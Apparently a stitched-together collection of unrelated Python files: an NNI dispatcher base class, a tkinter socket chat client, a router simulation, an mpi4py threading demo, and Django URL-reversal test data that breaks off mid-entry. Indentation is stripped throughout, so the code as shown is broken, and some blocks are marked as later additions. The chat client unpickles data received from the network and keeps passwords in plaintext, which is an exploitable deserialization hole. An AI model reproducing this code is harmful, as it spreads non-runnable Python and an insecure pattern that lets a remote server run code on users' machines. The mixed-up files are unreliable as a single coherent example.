msg_dispatcher_base.py
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and
# associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute,
# sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT
# NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT
# OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# ==================================================================================================
import os
import threading
import logging
from multiprocessing.dummy import Pool as ThreadPool
from queue import Queue, Empty
import json_tricks
from .common import multi_thread_enabled
from .env_vars import dispatcher_env_vars
from .utils import init_dispatcher_logger
from .recoverable import Recoverable
from .protocol import CommandType, receive
init_dispatcher_logger()
_logger = logging.getLogger(__name__)
QUEUE_LEN_WARNING_MARK = 20
_worker_fast_exit_on_terminate = True
class MsgDispatcherBase(Recoverable):
"""This is where tuners and assessors are not defined yet.
Inherits this class to make your own advisor.
"""
def __init__(self):
if multi_thread_enabled():
self.pool = ThreadPool()
self.thread_results = []
else:
self.stopping = False
self.default_command_queue = Queue()
self.assessor_command_queue = Queue()
self.default_worker = threading.Thread(target=self.command_queue_worker, args=(self.default_command_queue,))
self.assessor_worker = threading.Thread(target=self.command_queue_worker,
args=(self.assessor_command_queue,))
self.default_worker.start()
self.assessor_worker.start()
self.worker_exceptions = []
def run(self):
"""Run the tuner.
This function will never return unless an exception is raised.
"""
_logger.info('Start dispatcher')
if dispatcher_env_vars.NNI_MODE == 'resume':
self.load_checkpoint()
while True:
command, data = receive()
if data:
data = json_tricks.loads(data)
if command is None or command is CommandType.Terminate:
break
if multi_thread_enabled():
result = self.pool.map_async(self.process_command_thread, [(command, data)])
self.thread_results.append(result)
if any([thread_result.ready() and not thread_result.successful() for thread_result in
self.thread_results]):
_logger.debug('Caught thread exception')
break
else:
self.enqueue_command(command, data)
if self.worker_exceptions:
break
_logger.info('Dispatcher exiting...')
self.stopping = True
if multi_thread_enabled():
self.pool.close()
self.pool.join()
else:
self.default_worker.join()
self.assessor_worker.join()
_logger.info('Terminated by NNI manager')
def command_queue_worker(self, command_queue):
"""Process commands in command queues.
"""
while True:
try:
# set timeout to ensure self.stopping is checked periodically
command, data = command_queue.get(timeout=3)
try:
self.process_command(command, data)
except Exception as e:
_logger.exception(e)
self.worker_exceptions.append(e)
break
except Empty:
pass
if self.stopping and (_worker_fast_exit_on_terminate or command_queue.empty()):
break
def enqueue_command(self, command, data):
"""Enqueue command into command queues
"""
if command == CommandType.TrialEnd or (
command == CommandType.ReportMetricData and data['type'] == 'PERIODICAL'):
self.assessor_command_queue.put((command, data))
else:
self.default_command_queue.put((command, data))
qsize = self.default_command_queue.qsize()
if qsize >= QUEUE_LEN_WARNING_MARK:
_logger.warning('default queue length: %d', qsize)
qsize = self.assessor_command_queue.qsize()
if qsize >= QUEUE_LEN_WARNING_MARK:
_logger.warning('assessor queue length: %d', qsize)
def process_command_thread(self, request):
"""Worker thread to process a command.
"""
command, data = request
if multi_thread_enabled():
try:
self.process_command(command, data)
except Exception as e:
_logger.exception(str(e))
raise
else:
pass
def process_command(self, command, data):
_logger.debug('process_command: command: [{}], data: [{}]'.format(command, data))
command_handlers = {
# Tuner commands:
CommandType.Initialize: self.handle_initialize,
CommandType.RequestTrialJobs: self.handle_request_trial_jobs,
CommandType.UpdateSearchSpace: self.handle_update_search_space,
CommandType.ImportData: self.handle_import_data,
CommandType.AddCustomizedTrialJob: self.handle_add_customized_trial,
# Tuner/Assessor commands:
CommandType.ReportMetricData: self.handle_report_metric_data,
CommandType.TrialEnd: self.handle_trial_end,
CommandType.Ping: self.handle_ping,
}
if command not in command_handlers:
raise AssertionError('Unsupported command: {}'.format(command))
command_handlers[command](data)
def handle_ping(self, data):
pass
def handle_initialize(self, data):
"""Initialize search space and tuner, if any
This method is meant to be called only once for each experiment, after calling this method,
dispatcher should `send(CommandType.Initialized, '')`, to set the status of the experiment to be "INITIALIZED".
Parameters
----------
data: dict
search space
"""
raise NotImplementedError('handle_initialize not implemented')
def handle_request_trial_jobs(self, data):
"""The message dispatcher is demanded to generate `data` trial jobs.
These trial jobs should be sent via `send(CommandType.NewTrialJob, json_tricks.dumps(parameter))`,
where `parameter` will be received by NNI Manager and eventually accessible to trial jobs as "next parameter".
Semantically, message dispatcher should do this `send` exactly `data` times.
The JSON sent by this method should follow the format of
{
"parameter_id": 42
"parameters": {
// this will be received by trial
},
"parameter_source": "algorithm" // optional
}
Parameters
----------
data: int
number of trial jobs
"""
raise NotImplementedError('handle_request_trial_jobs not implemented')
def handle_update_search_space(self, data):
"""This method will be called when search space is updated.
It's recommended to call this method in `handle_initialize` to initialize search space.
*No need to* notify NNI Manager when this update is done.
Parameters
----------
data: dict
search space
"""
raise NotImplementedError('handle_update_search_space not implemented')
def handle_import_data(self, data):
"""Import previous data when experiment is resumed.
Parameters
----------
data: list
a list of dictionaries, each of which has at least two keys, 'parameter' and 'value'
"""
raise NotImplementedError('handle_import_data not implemented')
def handle_add_customized_trial(self, data):
"""Experimental API. Not recommended for usage.
"""
raise NotImplementedError('handle_add_customized_trial not implemented')
def handle_report_metric_data(self, data):
"""Called when metric data is reported or new parameters are requested (for multiphase).
When new parameters are requested, this method should send a new parameter.
Parameters
----------
data: dict
a dict which contains 'parameter_id', 'value', 'trial_job_id', 'type', 'sequence'.
type: can be `MetricType.REQUEST_PARAMETER`, `MetricType.FINAL` or `MetricType.PERIODICAL`.
`REQUEST_PARAMETER` is used to request new parameters for multiphase trial job. In this case,
the dict will contain additional keys: `trial_job_id`, `parameter_index`. Refer to `msg_dispatcher.py`
as an example.
Raises
------
ValueError
Data type is not supported
"""
raise NotImplementedError('handle_report_metric_data not implemented')
def handle_trial_end(self, data):
"""Called when the state of one of the trials is changed
Parameters
----------
data: dict
a dict with keys: trial_job_id, event, hyper_params.
trial_job_id: the id generated by training service.
event: the job’s state.
hyper_params: the string that is sent by message dispatcher during the creation of trials.
"""
raise NotImplementedError('handle_trial_end not implemented')
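A minimal sketch, not part of the original module, of how a concrete advisor might subclass MsgDispatcherBase; it assumes the `send` helper that sits alongside `receive` in the `.protocol` module and fills in every handler the base class declares.

import json_tricks
from .protocol import CommandType, send  # assumption: send() lives alongside receive()

class RandomAdvisor(MsgDispatcherBase):
    """Toy advisor: answers every trial request with an empty parameter set."""
    def __init__(self):
        super().__init__()
        self.search_space = {}
        self._next_parameter_id = 0

    def handle_initialize(self, data):
        # `data` is the search space; acknowledge so the experiment becomes INITIALIZED
        self.handle_update_search_space(data)
        send(CommandType.Initialized, '')

    def handle_update_search_space(self, data):
        self.search_space = data

    def handle_request_trial_jobs(self, data):
        # `data` is the number of trial jobs requested; send exactly that many NewTrialJob commands
        for _ in range(data):
            parameter = {
                'parameter_id': self._next_parameter_id,
                'parameters': {},  # a real advisor would sample from self.search_space here
                'parameter_source': 'algorithm',
            }
            self._next_parameter_id += 1
            send(CommandType.NewTrialJob, json_tricks.dumps(parameter))

    def handle_report_metric_data(self, data):
        pass  # inspect data['type'], data['value'], data['trial_job_id'] as needed

    def handle_trial_end(self, data):
        pass

    def handle_import_data(self, data):
        pass

    def handle_add_customized_trial(self, data):
        pass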
client.py
import tkinter, logging, socket, time, pickle, threading, shelve, os
from tkinter.scrolledtext import ScrolledText
logging.basicConfig(level = logging.DEBUG, format = '%(asctime)s - %(message)s')
class Client(tkinter.Tk):
def __init__(self):
super().__init__()
logging.debug('Client started')
self.user = {}
self.contacts = []
#load settings
if os.path.isfile('settings.bak'):
settings_obj = shelve.open('settings')
print(list(settings_obj.keys()))
if 'user' in list(settings_obj.keys()):
self.user['username'] = settings_obj['user']
self.user['password'] = settings_obj['password']
else :
self.user = {'username': 'test', 'password': 'test'}
if 'port' in list(settings_obj.keys()):
self.port = int(settings_obj['port'])
else:
self.port = 888
if 'host' in list(settings_obj.keys()):
self.host = settings_obj['host']
else:
self.host = '127.0.0.1'
if 'contacts' in list(settings_obj.keys()):
self.contacts = settings_obj['contacts']
else:
self.contacts = ['Test']
settings_obj.close()
print(type(self.port))
print(type(self.host))
else:
self.user = {'username': 'test', 'password': 'test'}
self.port = 888
self.host = '127.0.0.1'
self.contacts = ['Test']
self.font = ('Tahoma', '8')
self.messages_to_send = []
self.child_chat_windows = []
#top menu
self.menu_bar = tkinter.Menu(self)
self.file_menu = tkinter.Menu(self.menu_bar, tearoff = 0, font = self.font)
self.file_menu.add_command(label = 'Add user', command = lambda: self.add_user_to_list(), font = self.font)
self.file_menu.add_command(label = 'Settings', font = self.font, command = lambda: self.settings())
self.menu_bar.add_cascade(label = 'settings', menu = self.file_menu, font = self.font)
self.config(menu = self.menu_bar)
#window elements
self.title('Contact List ' + self.user['username'])
self.resizable('false','false')
self.who_am_i = tkinter.Label(self, text = self.user['username'])
self.who_am_i.grid(column = 1, row = 1)
self.names_list = tkinter.Listbox(self, height = 30, width = 30, font = self.font)
self.names_list.grid(column = 1, row = 2)
self.button_start_chat = tkinter.Button(self, text = 'start chat', command = lambda: self.start_chat(), width = 30, font = self.font)
self.button_start_chat.grid(column = 1, row = 3)
self.button_add_user = tkinter.Button(self, text = 'remove selected user', command = lambda : self.remove_user_from_list(), width = 30, font = self.font)
self.button_add_user.grid(column = 1, row = 4)
self.update_list()
#threads
threading.Thread(target = self.logging_loop, daemon = True).start()
threading.Thread(target = self.server_connection, daemon = True).start()
# server connection transporter
def server_connection(self):
logging.debug('server_connection')
#echo frame sender / pass / message - echo
echo = {'username': self.user['username'], 'password': self.user['password'], 'message': 'echo'}
echo_pickle = pickle.dumps(echo)
while True:
time.sleep(1)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.host, self.port))
if self.messages_to_send:
    # pop to avoid mutating the list while iterating; send at most one queued frame per cycle
    ii = pickle.dumps(self.messages_to_send.pop(0))
    s.sendall(ii)
s.sendall(echo_pickle)
data_pickle = s.recv(1024)
data = pickle.loads(data_pickle)
if isinstance(data, dict):
in_list = False
for i in self.child_chat_windows:
if data['sender'] == i.recipient_name:
in_list = True
if in_list:
i.text_chat_window.configure(state = 'normal')
i.text_chat_window.insert('end', 'from ' + data['sender'] + ': ' + data['message'] + '\n')
i.text_chat_window.configure(state = 'disabled')
i.text_chat_window.see('end')
else:
self.start_chat(data['sender'])
for i in self.child_chat_windows:
if data['sender'] == i.recipient_name:
i.text_chat_window.configure(state = 'normal')
i.text_chat_window.insert('end', 'from ' + data['sender'] + ': ' + data['message'] + '\n')
i.text_chat_window.configure(state = 'disabled')
i.text_chat_window.see('end')
#update contact list
def update_list(self, name = None):
logging.debug('update_list')
self.names_list.delete('0', 'end')
if name:
if name not in self.contacts:
self.contacts.append(name)
for i in self.contacts:
self.names_list.insert('end', i)
with shelve.open('settings') as settings_obj:
    settings_obj['contacts'] = self.contacts
#add user to list - class
def add_user_to_list(self):
child_client_add_user_window = Client_add_user_window(self)
#remove user from list
def remove_user_from_list(self):
self.contacts.remove(self.names_list.get('active'))
self.update_list()
#start settings window - class
def settings(self):
child_settings_window = Settings_window(self)
#start chat window - class
def start_chat(self, recipient = None):
if recipient is None:
name_from_list = self.names_list.get('active')
else:
name_from_list = recipient
child_chat_window = Client_chat_window(self, name_from_list)
self.child_chat_windows.append(child_chat_window)
#logging loop
def logging_loop(self):
time.sleep(1)
while True:
time.sleep(0.5)
print(self.child_chat_windows)
time.sleep(2)
print(self.messages_to_send)
for i in self.child_chat_windows:
print(i.recipient_name)
class Settings_window(tkinter.Toplevel):
def __init__(self, parent):
super().__init__()
self.parent = parent
self.title('Settings')
# window settings
self.label_user = tkinter.Label(self, text = 'user', font = self.parent.font)
self.label_user.grid(column = 1, row = 1)
self.entry_user = tkinter.Entry(self, width = 30, font = self.parent.font)
self.entry_user.insert('end', self.parent.user['username'])
self.entry_user.grid(column = 1, row = 2)
self.label_password = tkinter.Label(self,text = 'password', font = self.parent.font)
self.label_password.grid(column = 1, row = 3)
self.entry_password = tkinter.Entry(self, width = 30, font = self.parent.font)
self.entry_password.insert('end', self.parent.user['password'])
self.entry_password.grid(column = 1, row = 4)
self.label_server = tkinter.Label(self, text = 'server IP', font = self.parent.font)
self.label_server.grid(column = 1, row = 5)
self.entry_server = tkinter.Entry(self, width = 30, font = self.parent.font)
self.entry_server.insert('end', self.parent.host)
self.entry_server.grid(column = 1, row = 6)
self.label_port = tkinter.Label(self, text = 'server port', font = self.parent.font)
self.label_port.grid(column = 1, row = 7)
self.entry_port = tkinter.Entry(self, width = 30, font = self.parent.font)
self.entry_port.insert('end', self.parent.port)
self.entry_port.grid(column = 1, row = 8)
self.button_ok_save = tkinter.Button(self, text = 'OK & Save', command = lambda: self.ok_save(), font = self.parent.font)
self.button_ok_save.grid(column = 1, row = 10)
self.button_ok_save.focus_set()
self.info_label = tkinter.Label(self, text = 'Restart needed to apply changes', font = ('Impact', '9'))
self.info_label.grid(column = 1, row = 9)
#save data to file
def ok_save(self):
data_obj = shelve.open('settings')
data_obj['user'] = self.entry_user.get()
data_obj['password'] = self.entry_password.get()
data_obj['host'] = self.entry_server.get()
data_obj['port'] = int(self.entry_port.get())
data_obj.close()
self.destroy()
class Client_chat_window(tkinter.Toplevel):
def __init__(self, parent, recipient_name):
super().__init__()
self.parent = parent
self.recipient_name = recipient_name
self.title('Chat with ' + recipient_name)
self.protocol("WM_DELETE_WINDOW", self.close)
#normal window
# ~ self.text_chat_window = tkinter.Text(self, width = 70, height = 15)
#scrolled window
self.text_chat_window = ScrolledText(self, width = 70, height = 15)
self.text_chat_window.grid(column = 1, row = 1)
self.entry_message_field = tkinter.Entry(self, width = 65)
self.entry_message_field.bind('<Return>', self.enter_action)
self.entry_message_field.grid(column = 1, row = 2)
self.entry_message_field.focus_set()
self.text_chat_window.configure(state = 'disabled')
def enter_action(self, event):
#enter field to chat window
message = self.entry_message_field.get()
self.text_chat_window.configure(state = 'normal')
self.text_chat_window.insert('end', self.parent.user['username'] + ': ' + message + '\n')
self.text_chat_window.configure(state = 'disabled')
self.text_chat_window.see('end')
self.entry_message_field.delete('0', 'end')
#message to send, whole frame
message = {'sender': self.parent.user['username'], 'recipient': self.recipient_name, 'message': message}
self.parent.messages_to_send.append(message)
def close(self):
# rebuild the list to avoid removing items while iterating over it
self.parent.child_chat_windows = [w for w in self.parent.child_chat_windows if w.recipient_name != self.recipient_name]
self.destroy()
class Client_add_user_window(tkinter.Toplevel):
def __init__(self, parent):
super().__init__()
self.parent = parent
self.title('Add user...')
self.entry_add_user = tkinter.Entry(self, width = 30)
self.entry_add_user.focus_set()
self.entry_add_user.grid(column = 1, row = 1)
self.button_ok = tkinter.Button(self, text = 'ok', width = 30, command = lambda: self.button_ok_action())
self.button_ok.grid(column = 1, row = 2)
def button_ok_action(self):
name = self.entry_add_user.get().strip()
self.parent.update_list(name)
self.destroy()
if __name__ == '__main__':
client = Client()
client.mainloop()
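A small helper sketch, not part of the original client, for pre-seeding the settings shelf with the keys the client reads ('user', 'password', 'host', 'port', 'contacts'); note the client only loads them when a 'settings.bak' file exists, which depends on the dbm backend shelve happens to use.

import shelve

def seed_settings():
    # placeholder values; keys mirror the lookups in Client.__init__
    with shelve.open('settings') as s:
        s['user'] = 'alice'          # read back into self.user['username']
        s['password'] = 'secret'
        s['host'] = '127.0.0.1'
        s['port'] = 888
        s['contacts'] = ['Test']
# seed_settings()  # run once before starting the client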
simulation_3.py
'''
Created on Oct 12, 2016
@author: mwittie
'''
import network_3 as network
import link_3 as link
import threading
from time import sleep
##configuration parameters
router_queue_size = 0 #0 means unlimited
simulation_time = 20 #give the network sufficient time to transfer all packets before quitting
if __name__ == '__main__':
# Router Tables
table_A = {
1: 0,
2: 1
}
table_B = {
1: 0
}
table_C = {
2: 0
}
table_D = {
1: 0,
2: 1
}
object_L = [] #keeps track of objects, so we can kill their threads
#create network nodes
# Host 1
client1 = network.Host(1)
object_L.append(client1)
# Host 2
client2 = network.Host(2)
object_L.append(client2)
# Host 3
server1 = network.Host(3)
object_L.append(server1)
# Host 4
server2 = network.Host(4)
object_L.append(server2)
# Router A
router_a = network.Router(name='A', intf_count=len(table_A), max_queue_size=router_queue_size, routing_table=table_A)
object_L.append(router_a)
# Router B
router_b = network.Router(name='B', intf_count=len(table_B), max_queue_size=router_queue_size, routing_table=table_B)
object_L.append(router_b)
# Router C
router_c = network.Router(name='C', intf_count=len(table_C), max_queue_size=router_queue_size, routing_table=table_C)
object_L.append(router_c)
# Router D
router_d = network.Router(name='D', intf_count=len(table_D), max_queue_size=router_queue_size, routing_table=table_D)
object_L.append(router_d)
#create a Link Layer to keep track of links between network nodes
link_layer = link.LinkLayer()
object_L.append(link_layer)
#add all the links
#link parameters: from_node, from_intf_num, to_node, to_intf_num, mtu
link_layer.add_link(link.Link(client1, 0, router_a, 0, 50))
link_layer.add_link(link.Link(client2, 0, router_a, 1, 50))
# Router A links to next object
link_layer.add_link(link.Link(router_a, 0, router_b, 0, 50))
link_layer.add_link(link.Link(router_a, 1, router_c, 0, 50))
# Router B links to next object
link_layer.add_link(link.Link(router_b, 0, router_d, 0, 30))
# Router C links to next object
link_layer.add_link(link.Link(router_c, 0, router_d, 1, 30))
# Router D links to next object
link_layer.add_link(link.Link(router_d, 0, server1, 0, 50))
link_layer.add_link(link.Link(router_d, 1, server2, 0, 50))
#start all the objects
thread_L = []
# Host Threads
thread_L.append(threading.Thread(name=client1.__str__(), target=client1.run))
thread_L.append(threading.Thread(name=client2.__str__(), target=client2.run))
thread_L.append(threading.Thread(name=server1.__str__(), target=server1.run))
thread_L.append(threading.Thread(name=server2.__str__(), target=server2.run))
# Router Threads
thread_L.append(threading.Thread(name=router_a.__str__(), target=router_a.run))
thread_L.append(threading.Thread(name=router_b.__str__(), target=router_b.run))
thread_L.append(threading.Thread(name=router_c.__str__(), target=router_c.run))
thread_L.append(threading.Thread(name=router_d.__str__(), target=router_d.run))
thread_L.append(threading.Thread(name="Network", target=link_layer.run))
for t in thread_L:
t.start()
#create some send events
for i in range(3):
message = 'Sample data yaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaay %d' % i
client1.udt_send(1, 3, message)
client2.udt_send(2, 4, message)
#give the network sufficient time to transfer all packets before quitting
sleep(simulation_time)
#join all threads
for o in object_L:
o.stop = True
for t in thread_L:
t.join()
print("All simulation threads joined")
# writes to host periodically
threads.py
#!/usr/bin/env python
if False:
import mpi4py
name = "name" # lib{name}.so
path = []
mpi4py.profile(name, path=path)
import threading
from mpi4py import MPI
from array import array
send_msg = array('i', [7]*1000); send_msg *= 1000
recv_msg = array('i', [0]*1000); recv_msg *= 1000
def self_send(comm, rank):
comm.Send([send_msg, MPI.INT], dest=rank, tag=0)
def self_recv(comm, rank):
comm.Recv([recv_msg, MPI.INT], source=rank, tag=0)
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
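# Hedged addition, not in the original script: calling Send and Recv from two threads
# at the same time requires full MPI thread support, so check for it before starting.
if MPI.Query_thread() < MPI.THREAD_MULTIPLE:
    raise RuntimeError('This example needs an MPI library that provides MPI_THREAD_MULTIPLE')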
send_thread = threading.Thread(target=self_send, args=(comm, rank))
recv_thread = threading.Thread(target=self_recv, args=(comm, rank))
send_thread.start()
recv_thread.start()
recv_thread.join()
send_thread.join()
tests.py
"""
Unit tests for reverse URL lookups.
"""
import sys
import threading
from admin_scripts.tests import AdminScriptTestCase
from django.conf import settings
from django.contrib.auth.models import User
from django.core.exceptions import ImproperlyConfigured, ViewDoesNotExist
from django.http import (
HttpRequest, HttpResponsePermanentRedirect, HttpResponseRedirect,
)
from django.shortcuts import redirect
from django.test import (
RequestFactory, SimpleTestCase, TestCase, override_settings,
)
from django.test.utils import override_script_prefix
from django.urls import (
NoReverseMatch, Resolver404, ResolverMatch, URLPattern, URLResolver,
get_callable, get_resolver, get_urlconf, include, path, re_path, resolve,
reverse, reverse_lazy,
)
from django.urls.resolvers import RegexPattern
from . import middleware, urlconf_outer, views
from .utils import URLObject
from .views import empty_view
resolve_test_data = (
# These entries are in the format: (path, url_name, app_name, namespace, view_name, func, args, kwargs)
# Simple case
('/normal/42/37/', 'normal-view', '', '', 'normal-view', views.empty_view, (), {'arg1': '42', 'arg2': '37'}),
(
'/view_class/42/37/', 'view-class', '', '', 'view-class', views.view_class_instance, (),
{'arg1': '42', 'arg2': '37'}
),
(
'/included/normal/42/37/', 'inc-normal-view', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-normal-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/included/view_class/42/37/', 'inc-view-class', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-view-class',
views.view_class_instance, (), {'arg1': '42', 'arg2': '37'}
),
# Unnamed args are dropped if you have *any* kwargs in a pattern
('/mixed_args/42/37/', 'mixed-args', '', '', 'mixed-args', views.empty_view, (), {'arg2': '37'}),
(
'/included/mixed_args/42/37/', 'inc-mixed-args', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-mixed-args',
views.empty_view, (), {'arg2': '37'}
),
(
'/included/12/mixed_args/42/37/', 'inc-mixed-args', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-mixed-args',
views.empty_view, (), {'arg2': '37'}
),
# Unnamed views should have None as the url_name. Regression data for #21157.
(
'/unnamed/normal/42/37/', None, '', '', 'urlpatterns_reverse.views.empty_view', views.empty_view, (),
{'arg1': '42', 'arg2': '37'}
),
(
'/unnamed/view_class/42/37/', None, '', '', 'urlpatterns_reverse.views.ViewClass', views.view_class_instance,
(), {'arg1': '42', 'arg2': '37'}
),
# If you have no kwargs, you get an args list.
('/no_kwargs/42/37/', 'no-kwargs', '', '', 'no-kwargs', views.empty_view, ('42', '37'), {}),
(
'/included/no_kwargs/42/37/', 'inc-no-kwargs', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-no-kwargs',
views.empty_view, ('42', '37'), {}
),
(
'/included/12/no_kwargs/42/37/', 'inc-no-kwargs', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-no-kwargs',
views.empty_view, ('12', '42', '37'), {}
),
# Namespaces
(
'/test1/inner/42/37/', 'urlobject-view', 'testapp', 'test-ns1', 'test-ns1:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/included/test3/inner/42/37/', 'urlobject-view', 'included_namespace_urls:testapp',
'included_namespace_urls:test-ns3', 'included_namespace_urls:test-ns3:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/ns-included1/normal/42/37/', 'inc-normal-view', 'included_namespace_urls',
'inc-ns1', 'inc-ns1:inc-normal-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/included/test3/inner/42/37/', 'urlobject-view', 'included_namespace_urls:testapp',
'included_namespace_urls:test-ns3', 'included_namespace_urls:test-ns3:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/default/inner/42/37/', 'urlobject-view', 'testapp', 'testapp', 'testapp:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/other2/inner/42/37/', 'urlobject-view', 'nodefault', 'other-ns2', 'other-ns2:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/other1/inner/42/37/', 'urlobject-view', 'nodefault', 'other-ns1', 'other-ns1:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
# Nested namespaces
(
'/ns-included1/test3/inner/42/37/', 'urlobject-view', 'included_namespace_urls:testapp',
'inc-ns1:test-ns3', 'inc-ns1:test-ns3:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/ns-included1/ns-included4/ns-included2/test3/inner/42/37/', 'urlobject-view',
'included_namespace_urls:namespace_urls:included_namespace_urls:testapp',
'inc-ns1:inc-ns4:inc-ns2:test-ns3',
'inc-ns1:inc-ns4:inc-ns2:test-ns3:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/app-included/test3/inner/42/37/', 'urlobject-view', 'included_namespace_urls:testapp', 'inc-app:test-ns3',
'inc-app:test-ns3:urlobject-view', views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/app-included/ns-included4/ns-included2/test3/inner/42/37/', 'urlobject-view',
'included_namespace_urls:namespace_urls:included_namespace_urls:testapp',
'inc-app:inc-ns4:inc-ns2:test-ns3',
'inc-app:inc-ns4:inc-ns2:test-ns3:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
# Namespaces capturing variables
(
'/inc70/', 'inner-nothing', 'included_urls', 'inc-ns5', 'inc-ns5:inner-nothing',
views.empty_view, (), {'outer': '70'}
),
(
'/inc78/extra/foobar/', 'inner-extra', 'included_urls', 'inc-ns5', 'inc-ns5:inner-extra',
views.empty_view, (), {'outer': '78', 'extra': 'foobar'}
),
)
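# Hedged illustration, not part of the original test module: how the first
# resolve_test_data entry maps onto the ResolverMatch returned by resolve().
def _example_resolver_match_fields():
    match = resolve('/normal/42/37/')
    assert match.url_name == 'normal-view'
    assert match.app_name == ''
    assert match.namespace == ''
    assert match.view_name == 'normal-view'
    assert match.func is views.empty_view
    assert match.args == ()
    assert match.kwargs == {'arg1': '42', 'arg2': '37'}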
test_data = (
('places', '/places/3/', [3], {}),
('places', '/places/3/', ['3'], {}),
('places', NoReverseMatch, ['a'], {}),
('places', NoReverseMatch, [], {}),
('places?', '/place/', [], {}),
('places+', '/places/', [], {}),
('places*', '/place/', [], {}),
('places2?', '/', [], {}),
('places2+', '/places/', [], {}),
('places2*', '/', [], {}),
('places3', '/places/4/', [4], {}),
('places3', '/places/harlem/', ['harlem'], {}),
('places3', NoReverseMatch, ['harlem64'], {}),
('places4', '/places/3/', [], {'id': 3}),
('people', NoReverseMatch, [], {}),
('people', '/people/adrian/', ['adrian'], {}),
('people', '/people/adrian/', [], {'name': 'adrian'}),
('people', NoReverseMatch, ['name with spaces'], {}),
('people', NoReverseMatch, [], {'name': 'name with spaces'}),
('people2', '/people/name/', [], {}),
('people2a', '/people/name/fred/', ['fred'], {}),
('people_backref', '/people/nate-nate/', ['nate'], {}),
('people_backref', '/people/nate-nate/', [], {'name': 'nate'}),
('optional', '/optional/fred/', [], {'name': 'fred'}),
('optional', '/optional/fred/', ['fred'], {}),
('named_optional', '/optional/1/', [1], {}),
('named_optional', '/optional/1/', [], {'arg1': 1}),
('named_optional', '/optional/1/2/', [1, 2], {}),
('named_optional', '/optional/1/2/', [], {'arg1': 1, 'arg2': 2}),
('named_optional_terminated', '/optional/1/', [1], {}),
('named_optional_terminated', '/optional/1/', [], {'arg1': 1}),
('named_optional_terminated', '/optional/1/2/', [1, 2], {}),
('named_optional_terminated', '/optional/1/2/', [], {'arg1': 1, 'arg2': 2}),
('hardcoded', '/hardcoded/', [], {}),
('hardcoded2', '/hardcoded/doc.pdf', [], {}),
('people3', '/people/il/adrian/', [], {'state': 'il', 'name': 'adrian'}),
('people3', NoReverseMatch, [], {'state': 'il'}),
('people3', NoReverseMatch, [], {'name': 'adrian'}),
('people4', NoReverseMatch, [], {'state': 'il', 'name': 'adrian'}),
('people6', '/people/il/test/adrian/', ['il/test', 'adrian'], {}),
('people6', '/people//adrian/', ['adrian'], {}),
('range', '/character_set/a/', [], {}),
('range2', '/character_set/x/', [], {}),
('price', '/price/$10/', ['10'], {}),
('price2', '/price/$10/', ['10'], {}),
('price3', '/price/$10/', ['10'], {}),
('product', '/product/chocolate+($2.00)/', [], {'price': '2.00', 'product': 'chocolate'}),
('headlines', '/headlines/2007.5.21/', [], {'year': 2007, 'month': 5, 'day': 21}),
(
'windows', r'/windows_path/C:%5CDocuments%20and%20Settings%5Cspam/', [],
{'drive_name': 'C', 'path': r'Documents and Settings\spam'}
),
('special', r'/special_chars/~@+%5C$*%7C/', [r'~@+\$*|'], {}),
('special', r'/special_chars/some%20resource/', [r'some resource'], {}),
('special', r'/special_chars/10%25%20complete/', [r'10% complete'], {}),
('special', r'/special_chars/some%20resource/', [], {'chars': r'some resource'}),
('special', r'/special_chars/10%25%20complete/', [], {'chars': r'10% complete'}),
('special', NoReverseMatch, [''], {}),
('mixed', '/john/0/', [], {'name': 'john'}),
('repeats', '/repeats/a/', [], {}),
('repeats2', '/repeats/aa/', [], {}),
('repeats3', '/repeats/aa/', [], {}),
('test', '/test/1', [], {}),
('inner-nothing', '/outer/42/', [], {'outer': '42'}),
('inner-nothing', '/outer/42/', ['42'], {}),
('inner-nothing', NoReverseMatch, ['foo'], {}),
('inner-extra', '/outer/42/extra/inner/', [], {'extra': 'inner', 'outer': '42'}),
('inner-extra', '/outer/42/extra/inner/', ['42', 'inner'], {}),
('inner-extra', NoReverseMatch, ['fred', 'inner'], {}),
('inner-no-kwargs', '/outer-no-kwargs/42/inner-no-kwargs/1/', ['42', '1'], {}),
('disjunction', NoReverseMatch, ['foo'], {}),
('inner-disjunction', NoReverseMatch, ['10', '11'], {}),
('extra-places', '/e-places/10/', ['10'], {}),
